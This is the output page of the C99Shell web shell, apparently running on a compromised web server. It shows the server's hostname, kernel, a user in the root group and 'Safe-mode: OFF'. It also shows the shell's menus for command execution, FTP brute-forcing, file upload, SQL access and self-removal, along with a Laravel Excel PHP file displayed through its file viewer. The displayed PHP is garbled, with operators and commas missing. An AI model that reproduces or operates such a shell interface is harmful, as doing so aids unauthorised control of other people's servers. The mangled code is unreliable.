!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/maatwebsite/excel/src/Imports/   drwxr-xr-x
Free 28.55 GB of 117.98 GB (24.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ModelImporter.php (4.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Maatwebsite\Excel\Imports;

use 
Maatwebsite\Excel\Concerns\SkipsEmptyRows;
use 
Maatwebsite\Excel\Concerns\ToModel;
use 
Maatwebsite\Excel\Concerns\WithBatchInserts;
use 
Maatwebsite\Excel\Concerns\WithCalculatedFormulas;
use 
Maatwebsite\Excel\Concerns\WithColumnLimit;
use 
Maatwebsite\Excel\Concerns\WithEvents;
use 
Maatwebsite\Excel\Concerns\WithFormatData;
use 
Maatwebsite\Excel\Concerns\WithMapping;
use 
Maatwebsite\Excel\Concerns\WithProgressBar;
use 
Maatwebsite\Excel\Concerns\WithValidation;
use 
Maatwebsite\Excel\Events\AfterBatch;
use 
Maatwebsite\Excel\HasEventBus;
use 
Maatwebsite\Excel\Row;
use 
PhpOffice\PhpSpreadsheet\Worksheet\Worksheet;

class 
ModelImporter
{
    use 
HasEventBus;

    
/**
     * @var ModelManager
     */
    
private $manager;

    
/**
     * @param  ModelManager  $manager
     */
    
public function __construct(ModelManager $manager)
    {
        
$this->manager $manager;
    }

    
/**
     * @param  Worksheet  $worksheet
     * @param  ToModel  $import
     * @param  int|null  $startRow
     * @param  string|null  $endColumn
     *
     * @throws \Maatwebsite\Excel\Validators\ValidationException
     */
    
public function import(Worksheet $worksheetToModel $importint $startRow 1)
    {
        if (
$startRow $worksheet->getHighestRow()) {
            return;
        }
        if (
$import instanceof WithEvents) {
            
$this->registerListeners($import->registerEvents());
        }

        
$headingRow       HeadingRowExtractor::extract($worksheet$import);
        
$headerIsGrouped  HeadingRowExtractor::extractGrouping($headingRow$import);
        
$batchSize        $import instanceof WithBatchInserts $import->batchSize() : 1;
        
$endRow           EndRowFinder::find($import$startRow$worksheet->getHighestRow());
        
$progessBar       $import instanceof WithProgressBar;
        
$withMapping      $import instanceof WithMapping;
        
$withCalcFormulas $import instanceof WithCalculatedFormulas;
        
$formatData       $import instanceof WithFormatData;
        
$withValidation   $import instanceof WithValidation && method_exists($import'prepareForValidation');
        
$endColumn        $import instanceof WithColumnLimit $import->endColumn() : null;

        
$this->manager->setRemembersRowNumber(method_exists($import'rememberRowNumber'));

        
$i             0;
        
$batchStartRow $startRow;
        foreach (
$worksheet->getRowIterator($startRow$endRow) as $spreadSheetRow) {
            
$i++;

            
$row = new Row($spreadSheetRow$headingRow$headerIsGrouped);
            if (!
$import instanceof SkipsEmptyRows || !$row->isEmpty($withCalcFormulas)) {
                
$rowArray $row->toArray(null$withCalcFormulas$formatData$endColumn);

                if (
$import instanceof SkipsEmptyRows && method_exists($import'isEmptyWhen') && $import->isEmptyWhen($rowArray)) {
                    continue;
                }

                if (
$withValidation) {
                    
$rowArray $import->prepareForValidation($rowArray$row->getIndex());
                }

                if (
$withMapping) {
                    
$rowArray $import->map($rowArray);
                }

                
$this->manager->add(
                    
$row->getIndex(),
                    
$rowArray
                
);

                
// Flush each batch.
                
if (($i $batchSize) === 0) {
                    
$this->flush($import$batchSize$batchStartRow);
                    
$batchStartRow += $i;
                    
$i 0;

                    if (
$progessBar) {
                        
$import->getConsoleOutput()->progressAdvance($batchSize);
                    }
                }
            }
        }

        if (
$i 0) {
            
// Flush left-overs.
            
$this->flush($import$batchSize$batchStartRow);
        }
    }

    private function 
flush(ToModel $importint $batchSizeint $startRow)
    {
        
$this->manager->flush($import$batchSize 1);
        
$this->raise(new AfterBatch($this->manager$import$batchSize$startRow));
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0061 ]--